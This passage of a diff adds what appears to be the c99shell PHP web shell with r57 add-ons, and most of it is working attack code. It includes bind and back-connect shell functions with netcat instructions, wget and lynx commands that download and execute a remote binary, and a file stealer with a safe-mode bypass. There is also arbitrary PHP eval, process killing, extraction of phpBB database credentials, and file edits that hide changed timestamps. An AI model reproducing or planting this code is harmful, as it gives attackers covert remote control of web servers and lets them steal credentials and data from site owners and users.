(ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = " [".$disppath."]"; + } + else + { + $type = "DIR"; + $row[] = " [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;} + else {$row[] = "\"Info\" \"Change\" \"Download\" ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "
    Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

    "; + foreach($table as $row) + { + echo "\r\n"; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    + +    + "; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "                   "; + } + echo " 

    "; + echo ""; + } +} +if ($act == "tools") +{ + + + + + + + ?> + + + + + +

    :: Bind Functions By r57 ::

    +
    +
    +
    +Bind With Backd00r Burner


    +
    +
    + + + Back-Connection :
    Ip (default is your ip) :

    Port:


    +Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "!

    + +
    +
    + + + + + + + + + + + + +

    :: File Stealer Function Ripped fRom Tontonq 's File Stealer ... ::

    +
    Error_Log SAfe Mode Bypass By Psych0 ;) +
    + +
    + "size=84> + + +
    + + + + + + + + + + + +
    + +
    +
    +
    + + Dosyanin Adresi ? =

    +Nereya Kaydolcak? = ">

    + +
    +


    + + + + +
    + +
    +
    + + + + + + + + + + + + +Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...
    "; +} +if (!empty($_GET['dolma'])) +{ +$sayko=htmlspecialchars($_GET['dolma']); +if ($sayko == "wgetcan") +{ + +myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + + +} + +else if ($sayko =="freadcan") +{ +dosyayicek($adires,"sayko_bind"); +myshellexec("./sayko_bind"); +} + +else if ($sayko == "lynxcan") +{ +myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + +} + + + + + +} + +if (!empty($_POST['erorr'])) +{ + + + +error_log($_POST['erorr'], 3, "php://".$_POST['nere']); + + + +} + + + + + + + + + +} +if ($act == "processes") +{ + echo "Processes:
    "; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i".$head[$i]."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) +{ + echo "
    "; + foreach($tab as $i=>$k) + { + echo ""; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";} + echo ""; + } + echo "
    ".$v."
    "; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "Result of execution this PHP-code:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("","info"), + array("","html"), + array("","txt"), + array("Code","code"), + array("Session","phpsess"), + array("","exe"), + array("SDB","sdb"), + array("","img"), + array("","ini"), + array("","download"), + array("","notepad"), + array("","edit") + ); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "Information:"; + if (!$win) + { + echo "
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
    "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
    "; + $a2 .= "
    "; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + echo "
    ".$a0."".$a1."".$a2."

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 Encode
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
    "; + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [Full] [Preview]
    Base64: +
    [Encode +[+chunk +[+chunk+quotes +[Decode +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} + elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,TRUE)); echo "
    ";} + elseif ($ft == "phpsess") + { + echo "
    "; 
    +   $v = explode("|",$r); 
    +   echo $v[0]."
    "; + var_dump(unserialize($v[1])); + echo "
    "; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "Execute file:

    Display in text-area
    "; + } + elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:
    "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + echo "

    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
    Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo "   "; + } + echo "

    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 